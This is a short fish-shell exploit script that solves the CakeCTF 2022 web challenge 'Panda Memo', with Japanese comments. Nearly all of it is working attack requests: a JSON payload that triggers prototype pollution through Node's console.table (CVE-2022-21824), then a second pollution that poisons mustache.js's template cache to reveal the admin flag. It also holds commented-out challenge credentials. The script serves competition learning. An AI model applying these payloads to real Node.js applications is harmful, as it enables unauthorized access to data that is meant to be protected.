CakeCTF 2022 / Panda Memo

exploit.fish

# CakeCTF 2022 ( https://ctftime.org/event/1683 )
# web / Panda Memo

set BASE_URL "http://localhost:3000"
set BASIC_USER guest
set BASIC_PASS guest
# set BASE_URL "http://web2.2022.cakectf.com:40767"
# set BASIC_USER guest
# set BASIC_PASS L4VBqmWQZP6S2P8.

# --------------------------------------------------------------------------

# 1つ以上のメモを作成する
http -a "$BASIC_USER:$BASIC_PASS" POST "$BASE_URL/new"

# console.table経由でprototype pollutionを発火
# ref:
# * CVE-2022-21824: https://nodejs.org/en/blog/vulnerability/jan-2022-security-releases/#prototype-pollution-via-console-table-properties-low-cve-2022-21824
# * https://brycec.me/posts/dicectf_2022_writeups#vm-calc
echo '{"debug": true, "inspect": ["__proto__"]}' | http -a "$BASIC_USER:$BASIC_PASS" GET "$BASE_URL/show"

# 2段階目のprototype pollutionで、mustacheのテンプレートのパース結果を `{{flag}}` でキャッシュさせる
# ref: https://github.com/janl/mustache.js/blob/v4.2.0/mustache.js#L514
echo '{"ip": "__proto__", "index": "<!DOCTYPE html>\\n<html>\\n    <head>\\n        <meta charset=\\"UTF-8\\">\\n        <link rel=\\"stylesheet\\" href=\\"https://cdn.simplecss.org/simple.min.css\\">\\n        <title>Admin Panel - lolpanda</title>\\n    </head>\\n    <body>\\n        <header>\\n            <h1>Admin Panel</h1>\\n            <p>Please leave this page if you\'re not the admin.</p>\\n        </header>\\n        <main>\\n            <article style=\\"text-align: center;\\">\\n                <h2>FLAG</h2>\\n                <p>\\n                    {{#is_admin}}\\n                    FLAG: <code>{{flag}}</code>\\n                    {{/is_admin}}\\n                    {{^is_admin}}\\n                    <mark>Access Denied</mark>\\n                    {{/is_admin}}\\n                </p>\\n            </article>\\n        </main>\\n    </body>\\n</html>\\n:{{:}}", "memo": [["name", "flag", 0, 8]]}' | http -a "$BASIC_USER:$BASIC_PASS" POST "$BASE_URL/edit"

# `{{flag}}`のテンプレートをレンダリング
http -a "$BASIC_USER:$BASIC_PASS" GET "$BASE_URL/admin"